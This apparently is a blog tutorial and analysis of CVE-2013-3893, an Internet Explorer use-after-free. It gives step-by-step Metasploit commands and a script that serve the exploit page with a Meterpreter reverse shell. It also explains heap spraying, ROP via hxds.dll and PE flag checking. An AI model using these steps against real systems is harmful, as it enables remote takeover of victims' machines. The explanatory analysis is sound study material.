Friday, September 8, 2017

Exploiting and Analysing CVE 2013 3893



On September 17, 2013, Microsoft published Security Advisory 2887505 about a zero-day vulnerability in Internet Explorer that had been spotted in attacks against Japanese financial companies. On October 8 it shipped the fix in bulletin MS13-080. The vulnerability was assigned CVE-2013-3893. It is a use-after-free bug in mshtml.dll, Internet Explorer's rendering engine, in the SetMouseCapture functionality, and it allows remote code execution when exploited properly. The bug itself affects Internet Explorer 6 through 11; the in-the-wild exploit targeted machines running Windows XP or Windows 7 that also had Microsoft Office 2007 or Office 2010 installed.

Use-after-free means that a malicious page can make Internet Explorer free a heap object while the browser still holds a pointer to it. The attacker then arranges for the freed block to be reallocated with data he controls, so when the browser later uses the dangling pointer (for example to read a vtable and call a method through it) it ends up using attacker-supplied values. Without an attacker, such a bug normally just corrupts data and crashes the process; with one, it can be turned into execution of arbitrary code in the browser's context.

The other term worth highlighting is remote code execution. It applies to CVE-2013-3893 because the attacker needs no prior access to the victim machine: the victim only has to open a link to the malicious page, and the attacker's code then runs with the privileges of the user's browser process, giving him a foothold on the machine and access to the data that user can reach.

The Office 2007 or 2010 requirement exists because those versions ship hxds.dll, a module that was built without ASLR support and therefore always loads at the same address. The exploit uses it as a fixed source of code to bypass ASLR, as explained in the analysis section below.

Exploiting with Metasploit

This section is a short tutorial on using Metasploit to exploit this vulnerability. It is written for beginners who have never used Metasploit before; no programming skills are required to follow it.

First, let us define the requirements that have to be met for the attack to succeed. The Metasploit module is a bit more restricted than the original in-the-wild exploit: the target machine has to be running 32-bit Internet Explorer 9 on Windows 7 with Office 2007 or Office 2010 installed.

If you have not already, download the free Metasploit Community edition from Rapid7. Antivirus and host firewall software on the attacking machine will interfere with Metasploit (generated payloads get flagged, and the listener and web server ports may be blocked), so run it on a dedicated lab VM on an isolated network where you can safely disable them; do not do this on a machine that also has a route to production hosts.

Once Metasploit is installed and updated, start the Metasploit console (msfconsole) and give it a moment to initialize. If you get stuck or do not know which command to use, type help into the console to get a list of commands along with their descriptions.

To start, type use exploit/windows/browser/ie_setmousecapture_uaf to select the IE SetMouseCapture exploit module. If you do not know the name of a module you can use the search command; for example, I found this one by typing search setmouse into the console:


Once the exploit is selected, choose the payload that will be delivered to the vulnerable computer. Type show payloads to list the payloads compatible with this module, then select one with the set command. In this tutorial the aim is to run commands on the target with Meterpreter, so I typed set payload windows/meterpreter/reverse_tcp.


To see all exploit and payload options, type show options; you will see something like this:


For this payload you have to define LHOST, the address the reverse shell connects back to, so type set LHOST [IP address of your machine]. If you do not know your IP address, use ipconfig (or ifconfig on Linux). You should also set SRVHOST, the address the module's web server listens on, with set SRVHOST [IP address of your machine]; the default of 0.0.0.0 binds every interface, and pinning it to your lab address keeps the malicious page off any other network the attacking machine is connected to.

If you only want to test the exploit and do not care about getting a shell on the victim's machine, use the windows/messagebox payload, which just pops up a message box on the target. The windows/download_exec payload, by contrast, downloads an executable onto the target and runs it.

Once you are ready, type exploit. If everything is set up correctly you will see this in your console:


When the exploit starts, the console prints a URL. Open that URL in Internet Explorer on the target machine; Metasploit will serve the malicious page and attempt the exploit. Shortly afterwards you should see a message that a session has been opened. To list your open sessions, type sessions.
 

Then type sessions -i 1 to interact with the session on the victim's machine.

You can now use Meterpreter to control the victim's computer and inspect its data. The list of Meterpreter commands is in the Metasploit documentation (and available in the session itself via help).

If the exploit is not working, there are a few things to check. First of all, make sure the victim's system meets all of the requirements. Make sure it is the 32-bit version of IE9 and not the 64-bit one. If the console reports that the wrong browser is being used even though it is 32-bit IE9, check whether Internet Explorer is rendering the page in IE7 compatibility mode: click Tools in the menu bar, select Compatibility View settings, and if the attacker's address is listed there, remove it.
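
Here is the whole procedure above as a script, so it can be repeated without retyping the commands. This is an added example, not code from the original post or from the Metasploit project; it assumes msfconsole is on the PATH of the attacking machine, and the addresses it is fed (192.168.56.1 is a placeholder) are lab addresses passed in on the command line.

```sh
#!/bin/sh
# Drive the ie_setmousecapture_uaf module from an msfconsole resource script.
# Added example, not part of the original post. Assumes msfconsole is on PATH.
# Usage: sh setmouse.sh <LHOST> [SRVHOST] [LPORT]   (addresses are lab placeholders)

MODULE=exploit/windows/browser/ie_setmousecapture_uaf
DEFAULT_PAYLOAD=windows/meterpreter/reverse_tcp

# Reject anything that is not a dotted-quad IPv4 address before it reaches msfconsole.
valid_ipv4() {
  case $1 in
    ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  ( IFS=.; set -- $1
    [ $# -eq 4 ] || exit 1
    for octet; do [ "$octet" -le 255 ] || exit 1; done )
}

# Emit the resource script: LHOST/LPORT are where the reverse shell calls back,
# SRVHOST/SRVPORT/URIPATH are where the malicious page is served from.
# "exploit -j -z" runs the module as a background job so the console stays usable.
build_rc() {
  lhost=$1; srvhost=$2; payload=$3; lport=$4
  cat <<EOF
use $MODULE
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set SRVHOST $srvhost
set SRVPORT 8080
set URIPATH /
exploit -j -z
EOF
}

# Validate inputs, write the script to a temp file and hand it to msfconsole.
run_attack() {
  lhost=$1; srvhost=${2:-$1}; lport=${3:-4444}
  valid_ipv4 "$lhost"   || { echo "bad LHOST: $lhost" >&2; return 1; }
  valid_ipv4 "$srvhost" || { echo "bad SRVHOST: $srvhost" >&2; return 1; }
  rc=$(mktemp) || return 1
  build_rc "$lhost" "$srvhost" "$DEFAULT_PAYLOAD" "$lport" > "$rc"
  echo "resource script written to $rc; the victim must open http://$srvhost:8080/ in 32-bit IE9"
  msfconsole -q -r "$rc"
}

# Only launch when run directly with arguments; sourcing the file just defines the functions.
if [ $# -gt 0 ]; then run_attack "$@"; fi
```

The address check is there because everything in the resource script is pasted straight into the console; keeping garbage out of LHOST and SRVHOST is cheaper than debugging a handler that bound to nothing. SRVPORT 8080 and URIPATH / are explicit so the URL the victim has to open is always the same between runs.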

Analysing the Vulnerability and the Exploit

The best way to analyse an exploit is under a debugger. For Internet Explorer the usual choice is WinDbg, with symbols for mshtml.dll pulled from Microsoft's public symbol server, while IDA Pro is the standard disassembler for static analysis of the module. Together they let us see how the exploit actually works and what it does to memory.

The vulnerability lies in Internet Explorer's setCapture() handling (the SetMouseCapture functionality in mshtml.dll), which is normally used to route all mouse events to a single element. The exploit creates two elements on the malicious page, a parent and a child, and installs an onlosecapture event handler on the parent that calls document.write(). When setCapture() is then called on the child, the parent loses capture and the handler fires; document.write() replaces the document, which frees the existing DOM elements, including the one mshtml.dll is still in the middle of processing.



mshtml.dll still holds a pointer to the element that document.write() freed, and after the handler returns it keeps using it. With nothing else in place, IE9 simply crashes in mshtml.dll when it reads through the dangling pointer.


That read through a dangling pointer is the basis of the exploit: if the attacker reallocates the freed block with his own data, he controls what the browser reads there, including the function pointer it ends up calling. ASLR and DEP, however, make it hard to turn that hijacked call into execution of attacker-supplied code.

Heap spraying deals with the first half of the problem. By allocating large numbers of identical blocks, the attacker fills a big region of the heap with his data and makes it very likely that a chosen address (hard-coded in the exploit) lands inside it, so the fake object and the data it points to are where the hijacked call expects them. Note that this does not defeat ASLR, which randomises where modules are loaded; it only makes the attacker's own data findable at a predictable address.


The other problem the attackers had to address is DEP: Windows 7 will not execute code from memory pages marked NX (no execute), and the sprayed heap is such memory. To run code anyway they have to reuse instructions from pages that are already executable, and with ASLR in place they do not know where those pages (the loaded modules) are.

This is where hxds.dll, a part of Microsoft Office, comes in. It was linked without ASLR support (the DYNAMIC_BASE flag in its PE header is not set), so it always loads at the same base address. Since it is not in a random part of memory the attackers know exactly where its code is, and the malicious page can make IE load it simply by referencing the ms-help: URL protocol handler that Office registers.
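
Whether a module opts into ASLR is recorded in its PE header: the DYNAMIC_BASE bit (0x0040) of the optional header's DllCharacteristics field, with the DEP opt-in NX_COMPAT (0x0100) right next to it. The script below reads that field from any PE file, so the hxds.dll claim can be verified on a copy of the DLL taken from an Office installation. It is an added example, not code from the original post; the path is an assumption, and the make_fake_pe helper builds a minimal constructed header (no real code) purely so the checker can be exercised offline with nothing but od and dd.

```sh
#!/bin/sh
# pe_aslr_check: does a PE file opt into ASLR (DYNAMIC_BASE) and DEP (NX_COMPAT)?
# Added example, not from the original post. POSIX sh plus od/dd; fields are read
# byte by byte, so the result does not depend on the host's endianness.
# Usage: sh pe_aslr_check.sh /path/to/hxds.dll   (path is an assumption)

# Read a little-endian 16/32-bit unsigned integer at byte offset $2 of file $1.
le_u16() { set -- $(od -An -t u1 -j "$2" -N 2 "$1"); echo $(( $1 + ($2 << 8) )); }
le_u32() { set -- $(od -An -t u1 -j "$2" -N 4 "$1"); echo $(( $1 + ($2 << 8) + ($3 << 16) + ($4 << 24) )); }

# Print the DllCharacteristics field (decimal), or return 2 if the file is not a PE image.
pe_dll_characteristics() {
  f=$1
  [ "$(od -An -c -N 2 "$f" | tr -d ' ')" = "MZ" ] || return 2
  pe_off=$(le_u32 "$f" 60)                                   # e_lfanew: offset of "PE\0\0"
  [ "$(od -An -c -j "$pe_off" -N 2 "$f" | tr -d ' ')" = "PE" ] || return 2
  # The optional header follows the 4-byte signature and the 20-byte COFF header;
  # DllCharacteristics sits at offset 70 of the optional header in both PE32 and PE32+.
  le_u16 "$f" $(( pe_off + 4 + 20 + 70 ))
}

# Summarise the two mitigation flags as "aslr|no-aslr dep|no-dep".
pe_mitigations() {
  chars=$(pe_dll_characteristics "$1") || { echo "not-a-pe-file"; return 1; }
  if [ $(( chars & 64 )) -ne 0 ]; then a=aslr; else a=no-aslr; fi    # 0x0040 DYNAMIC_BASE
  if [ $(( chars & 256 )) -ne 0 ]; then d=dep; else d=no-dep; fi     # 0x0100 NX_COMPAT
  echo "$a $d"
}

# Build a minimal *constructed* PE header with the given DllCharacteristics so the checker
# can be tested without a Windows binary. Layout: MZ stub with e_lfanew=64, "PE\0\0" at 64,
# 20-byte COFF header, optional header (magic 0x10b) at 88, DllCharacteristics at 88+70=158.
make_fake_pe() {
  out=$1; dc=$2
  {
    printf 'MZ'; dd if=/dev/zero bs=1 count=58 2>/dev/null; printf '\100\0\0\0'
    printf 'PE\0\0'; dd if=/dev/zero bs=1 count=20 2>/dev/null
    printf '\013\001'; dd if=/dev/zero bs=1 count=68 2>/dev/null
    printf "\\$(printf '%03o' $(( dc & 255 )))\\$(printf '%03o' $(( dc >> 8 )))"
  } > "$out"
}

if [ $# -eq 1 ]; then pe_mitigations "$1"; fi
```

Run it against a copy of hxds.dll and the first word should be no-aslr; run it against a DLL that Windows ships with and it should be aslr. The same check, applied to every module a browser loads, is how an exploit writer finds a ROP source and how a defender finds the module that should be upgraded or blocked.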

hxds.dll's code pages are executable, so the attacker chains short instruction sequences from it (ROP gadgets) to do the rest of the work: typically to call a memory-protection API that marks the sprayed shellcode executable, after which the shellcode runs with the privileges of the browser, without any warning to the user of the targeted machine.

Conclusion

As we can see, this exploit chains weaknesses in more than one Windows component. By combining the use-after-free in IE's mshtml.dll with hxds.dll's lack of ASLR support, the attackers managed to gain complete control of the victim's system.

It shows how a few bugs that look harmless on their own can be combined by resourceful attackers, and how much ingenuity goes into a working exploit.

